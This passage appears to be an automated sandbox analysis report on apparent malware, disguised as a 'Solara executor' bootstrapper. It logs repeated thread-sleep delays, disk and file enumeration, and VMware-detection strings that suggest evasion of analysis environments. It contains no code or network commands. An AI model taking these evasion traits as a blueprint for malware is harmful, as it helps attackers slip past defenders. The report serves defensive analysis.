                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -586047s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -585657s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -584922s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -584438s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -584256s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -584089s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -583958s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -583822s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -583699s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -583554s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -583393s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -583250s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -583125s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -582995s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -582868s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -582764s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -582654s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -582532s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -582375s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -582238s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -582094s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -581971s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -581831s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -581704s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -581578s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -581425s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -581297s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -581113s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -580579s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -580374s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -580266s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -580154s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -580039s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -579875s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -579719s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -579485s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -579345s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -579204s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -579094s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -578969s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -578840s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D2A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_00D2A69B
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D3C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_00D3C220
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D3E6A3 VirtualQuery,GetSystemInfo,3_2_00D3E6A3
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599890Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599780Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599671Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599562Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599453Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599343Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599234Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599125Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 599015Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598906Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598796Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598686Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598578Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598468Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598233Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598125Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 598015Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597906Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597796Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597687Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597578Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597468Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597359Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597249Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597140Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 597031Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596921Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596812Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596703Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596593Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596484Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596375Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596265Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596156Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 596046Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595929Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595780Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595671Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595562Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595453Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595343Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595234Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595125Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 595015Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 594906Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 594796Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 594687Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 594578Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeThread delayed: delay time: 594468Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 30000
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 600000
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 599860
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 599454
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 598797
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 598516
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 597922
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 597547
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 3600000
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 597047
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 596547
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 596157
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 595532
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 595329
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 594954
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 594709
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 594547
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 594110
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 593735
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 593464
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 592922
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 592657
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 592344
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 591969
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 591625
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 591172
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 590547
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 300000
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 590276
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 590016
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 589625
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 589219
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 588766
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 588406
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 587860
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 587516
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 586985
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 586594
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 586047
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 585657
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 584922
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 584438
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 584256
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 584089
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583958
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583822
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583699
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583554
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583393
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583250
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583125
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582995
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582868
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582764
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582654
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582532
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582375
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582238
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582094
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581971
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581831
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581704
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581578
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581425
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581297
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581113
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 580579
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 580374
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 580266
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 580154
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 580039
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 579875
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 579719
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 579485
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 579345
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 579204
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 579094
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 578969
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 578840
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: Amcache.hve.7.drBinary or memory string: VMware
                                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                                    Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                                    Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                                    Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                    Source: PerfNET.exe, 0000000D.00000002.2472010093.000000001C3D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}itProp
                                    Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
